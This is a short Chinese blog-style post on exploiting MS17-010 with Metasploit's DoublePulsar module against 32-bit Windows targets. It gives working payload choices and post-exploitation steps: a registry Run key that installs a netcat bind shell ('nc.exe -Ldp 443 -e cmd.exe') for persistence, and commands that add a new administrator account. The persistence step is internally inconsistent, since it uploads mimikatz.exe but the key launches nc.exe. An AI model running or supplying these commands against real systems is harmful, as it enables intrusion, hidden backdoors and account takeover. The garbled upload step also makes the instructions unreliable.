(Metasploit) MS17-010 漏洞復(fù)現(xiàn)典中典之雙脈沖星 Doublepulsar 模塊攻擊失敗及其解決

以下過程全部經(jīng)由 Kali Linux,省略掉了那些大家都知道的內(nèi)容。
對(duì)于32位的靶機(jī),永恒之藍(lán)不能工作,因此獲取并配置雙脈沖星模塊,使用前,確認(rèn)?Wine32?狀態(tài)正常,設(shè)置攻擊參數(shù),但攻擊失敗了,信息顯示
Remote code execution... 3... 2... 1...?
Exploit completed, but no session was created.
在查閱了能找到的資料后,最終我的成功方案是更換載荷(payload)
下面列出該模塊幾個(gè)最通用的載荷
windows/meterpreter/reverse_tcp
windows/meterpreter/bind_tcp
windows/shell/reverse_tcp
windows/shell/bind_tcp
在我的測(cè)試過程中,大多數(shù)情況下設(shè)置載荷為?windows/meterpreter/bind_tcp 后運(yùn)行就能得到會(huì)話,盡管?reverse_tcp 的安全性高于?bind_tcp,但很無奈,前者就是不干活(很奇怪)。
漏洞利用成功后可能出現(xiàn)的一些其他情況:
如果靶機(jī)的 Shell 執(zhí)行指令后回顯亂碼,鍵入
chcp 65001
通常可以大幅改善情況
有些時(shí)候靶機(jī)會(huì)因被攻擊而在一分鐘內(nèi)重啟,這種情況下可以考慮使用 Netcat?完成持久化工作,Meterpreter 下鍵入
upload /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe C:\\windows
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\windows\nc.exe -Ldp 443 -e cmd.exe'
這樣我們等待靶機(jī)重啟后,鍵入指令進(jìn)行連接
nc -v [靶機(jī)ip]?443
嘗試遠(yuǎn)程桌面登錄但 Administrator 賬戶密碼為空( hashdump?因此報(bào)錯(cuò) )而導(dǎo)致無法登錄時(shí),使用靶機(jī) Shell 新建一個(gè)賬戶和密碼并將其加入管理員,然后用這個(gè)賬戶登錄
net user [username] [passwd] /add
net localgroup administrators [username]?/add